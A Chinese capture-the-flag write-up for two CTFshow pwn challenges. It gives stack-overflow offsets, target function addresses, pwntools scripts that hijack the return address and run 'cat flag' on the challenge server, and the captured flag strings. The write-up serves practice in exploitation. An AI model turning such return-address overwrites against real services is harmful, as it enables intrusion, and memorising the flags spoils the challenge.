CTFshow-pwn刷题
pwn02
32位的
双击pwnme这个函数
fgets函数,栈溢出
s的地址是-9,目标r的地址是4
这里有一个stack函数
地址是0x804850F
payload:
payload = b'a'*(0x9+4) + p64(0x0804850F)
exp
from pwn import*
p = remote('pwn.challenge.ctf.show',28185)
payload = b'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()
ctfshow{95cc7be7-bc2d-412b-9633-7131b3b507c3}
pwn05
32位的
F5main函数之后
双击welcome
双击s
s的地址是-14,目标地址r是4
getFlag的地址是:
0x8048486
构造payload
payload=b"a"*(0x14+4)+p32(0x08048486)
exp
from pwn import*
p = remote('pwn.challenge.ctf.show',28169)
payload=b"a"*(0x12+6)+p32(0x08048486)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()
ctfshow{33456f1e-e589-4481-8e0c-465b3317b85d}